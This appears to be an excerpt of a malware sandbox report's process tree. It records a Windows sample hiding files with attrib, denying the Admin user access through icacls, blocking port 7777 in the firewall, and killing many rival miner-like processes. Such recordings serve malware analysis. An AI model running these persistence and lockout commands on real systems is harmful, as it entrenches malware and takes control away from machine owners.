                                                                                                                        ATTRIB +H +S "C:\users\Admin\AppData\roaming\bot.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2752
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\users\Admin\AppData\roaming\nvidiadriver.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:3932
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe" /deny Admin:(D,F)
                                                                                                                        4⤵
                                                                                                                        • Possible privilege escalation attempt
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3224
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\programdata\olly.exe" /deny Admin:(D,F)
                                                                                                                        4⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:3868
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\programdata\iostream.exe" /deny Admin:(D,F)
                                                                                                                        4⤵
                                                                                                                          PID:3548
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\programdata\SystemIdle.exe" /deny Admin:(D,F)
                                                                                                                          4⤵
                                                                                                                          • Possible privilege escalation attempt
                                                                                                                          PID:3384
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\programdata\System Idle.exe" /deny Admin:(D,F)
                                                                                                                          4⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:6072
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\users\Admin\AppData\Roaming\winhost.exe" /deny Admin:(D,F)
                                                                                                                          4⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:4936
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\users\Admin\AppData\roaming\bot.exe" /deny Admin:(D,F)
                                                                                                                          4⤵
                                                                                                                          • Possible privilege escalation attempt
                                                                                                                          PID:3392
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\users\Admin\AppData\roaming\nvidiadriver.exe" /deny Admin:(D,F)
                                                                                                                          4⤵
                                                                                                                            PID:4344
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=7777 name="Block_7777"
                                                                                                                            4⤵
                                                                                                                            • Modifies Windows Firewall
                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5524
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule dir=out action=block protocol=tcp localport=7777 name="Block_7777"
                                                                                                                            4⤵
                                                                                                                            • Modifies Windows Firewall
                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                            PID:452
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            ATTRIB +H +S +R "C:\Programdata\system32\logs\svchost.exe"
                                                                                                                            4⤵
                                                                                                                              PID:4116
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              TASKKILL /IM systemcore.exe /T /F
                                                                                                                              4⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1512
                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                              ATTRIB +H +S +R "C:\users\Admin\AppData\roaming\subdir"
                                                                                                                              4⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:888
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\users\Admin\AppData\roaming\subdir" /deny Admin:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:744
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                TASKKILL /IM serviceon.exe /T /F
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4260
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                TASKKILL /IM ifxpers.exe /T /F
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:924
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                TASKKILL /IM "idle driver.exe" /T /F
                                                                                                                                4⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4776
                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"
                                                                                                                                4⤵
                                                                                                                                  PID:5248
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\users\Admin\appdata\roaming\microsoft software" /deny Admin:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                  PID:428
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM "taskhost.exe" /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4108
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM "intel1s.exe" /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4664
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM "intel.exe" /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3340
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM "intel1.exe" /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3500
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM "taskhostss.exe" /T /F
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5324
                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                  ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"
                                                                                                                                  4⤵
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:5588
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\users\Admin\AppData\Roaming\Microsoft\SystemCertificates" /deny Admin:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2340
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM moonlight.exe /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4060
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM moonlight.exe /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1500
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout 1
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:6032
                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                  ATTRIB +H +S +R "C:\windows\syswow64\xmr64"
                                                                                                                                  4⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:1788
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\windows\syswow64\xmr64" /deny Admin:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:5272
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  TASKKILL /IM intel1.exe /T /F
                                                                                                                                  4⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4772
                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                  ATTRIB +H +S +R "C:\programdata\GOOGLE"
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:2700
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\programdata\GOOGLE" /deny Admin:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                    PID:4360
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /IM ErrorCheck.exe /T /F
                                                                                                                                    4⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:920
                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                    ATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\macromedia"
                                                                                                                                    4⤵
                                                                                                                                      PID:4624
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\users\Admin\AppData\Roaming\macromedia" /deny Admin:(OI)(CI)(F)
                                                                                                                                      4⤵
                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                      PID:1644
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      TASKKILL /IM sidebar.exe /T /F
                                                                                                                                      4⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4856
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      ATTRIB +H +S C:\programdata\System32
                                                                                                                                      4⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:5644
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      TASKKILL /IM client.exe /T /F
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4972
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      TASKKILL /IM hostxmrig.exe /T /F
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5288
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout 1
                                                                                                                                      4⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:1248
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      ATTRIB +H +S +R "C:\windows\hhsm"
                                                                                                                                      4⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:2964
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\windows\hhsm" /deny Admin:(OI)(CI)(F)
                                                                                                                                      4⤵
                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                      PID:5584
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      TASKKILL /IM AudioSystemDriver.exe /T /F
                                                                                                                                      4⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1796
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft\Speech\"
                                                                                                                                      4⤵
                                                                                                                                        PID:2132
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\users\Admin\appdata\roaming\microsoft\Speech" /deny Admin:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:4512
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        TASKKILL /IM coretempapp.exe /T /F
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:436
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\coretempapp"
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1608
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\users\Admin\appdata\roaming\coretempapp" /deny Admin:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:2472
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        TASKKILL /IM kryptex.exe /T /F
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3488
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        TASKKILL /IM kryptex7.exe /T /F
                                                                                                                                        4⤵
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2160
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout 1
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5348
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        ATTRIB +H +S +R "C:\users\Admin\appdata\roaming\kryptex"
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:4328
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\users\Admin\appdata\roaming\kryptex" /deny Admin:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                          PID:5796
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM generictools.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2044
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM digitalsearch.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4028
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout 1
                                                                                                                                          4⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:3760
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          ATTRIB +H +S +R "C:\users\Admin\appdata\local\generictools"
                                                                                                                                          4⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:3744
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\users\Admin\appdata\local\generictools" /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:832
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM intel.exe /F
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5428
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          ATTRIB +H +S +R "C:\programdata\steam"
                                                                                                                                          4⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1688
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\programdata\steam" /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:5320
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM esif.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5940
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\programdata\esif.exe" /deny Admin:(D,F)
                                                                                                                                          4⤵
                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                          PID:3228
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM muxu.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1764
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM muxu.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4284
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout 1
                                                                                                                                          4⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:5260
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          ATTRIB +H +S "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}"
                                                                                                                                          4⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:3668
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}" /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:3752
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM CEF.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4084
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 1 /nobreak
                                                                                                                                          4⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:404
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          TASKKILL /IM CEF.exe /T /F
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5088
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls C:\programdata\Cefunpacked\ /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                          PID:5184
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Local\temp\System32
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2000
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Local\temp\Windowstask
                                                                                                                                          4⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1448
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls C:\users\Admin\AppData\Local\temp\Windowstask /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                          PID:1332
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls C:\users\Admin\AppData\Local\temp\System32 /deny Admin:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                            PID:2868
                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                            ATTRIB +H +S C:\temp\System32\Logs
                                                                                                                                            4⤵
                                                                                                                                            • Views/modifies file attributes
                                                                                                                                            PID:3728
                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                            ATTRIB +H +S C:\temp\Windowstask
                                                                                                                                            4⤵
                                                                                                                                              PID:4544
                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                              ATTRIB +H +S C:\temp
                                                                                                                                              4⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:4536
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls C:\temp\Windowstask /deny Admin:(OI)(CI)(F)
                                                                                                                                              4⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:3196
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls C:\temp\System32\Logs /deny Admin:(OI)(CI)(F)
                                                                                                                                              4⤵
                                                                                                                                                PID:4364
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM windefender.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:548
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM intel1.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2504
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM intel.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1116
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM nvidiahelp.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2216
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM taskhost.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:224
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM nvidiadriver.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3308
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout 1
                                                                                                                                                4⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:2660
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                ATTRIB +H +S "C:\users\Admin\AppData\roaming\system"
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:864
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\users\Admin\AppData\roaming\system" /deny Admin:(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                PID:4108
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                ATTRIB +H +S "c:\programdata\MicrosoftCorporation"
                                                                                                                                                4⤵
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:3984
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "c:\programdata\MicrosoftCorporation" /deny Admin:(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                PID:1992
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM intel.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4784
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM intel1.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4080
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM taskhost.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2260
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout 1
                                                                                                                                                4⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5588
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                ATTRIB +H +S C:\users\Admin\appdata\roaming\WindowsApps
                                                                                                                                                4⤵
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:2340
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\users\Admin\appdata\roaming\WindowsApps" /deny Admin:(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:2608
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM systemcore.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4792
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout 1
                                                                                                                                                4⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5528
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                ATTRIB +H +S C:\users\Admin\appdata\roaming\windowshelper
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:216
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:1788
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM hostdl.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5272
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM defender.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4772
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                TASKKILL /IM winmgmnt.exe /T /F
                                                                                                                                                4⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1632
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                ATTRIB +H +S +R "D:\Windowsdata"
                                                                                                                                                4⤵
                                                                                                                                                  PID:3656
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  ATTRIB +H +S +R "C:\Windowsdata"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5972
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    ATTRIB +H +S +R "E:\Windowsdata"
                                                                                                                                                    4⤵
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:6052
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    ATTRIB +H +S +R "K:\Windowsdata"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5964
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "D:\Windowsdata" /deny Admin:(OI)(CI)(F)
                                                                                                                                                      4⤵
                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                      PID:1772
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "C:\Windowsdata" /deny Admin:(OI)(CI)(F)
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:4600
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "E:\Windowsdata" /deny Admin:(OI)(CI)(F)
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1028
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "K:\Windowsdata" /deny Admin:(OI)(CI)(F)
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5424
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          TASKKILL /IM webservice.exe /T /F
                                                                                                                                                          4⤵
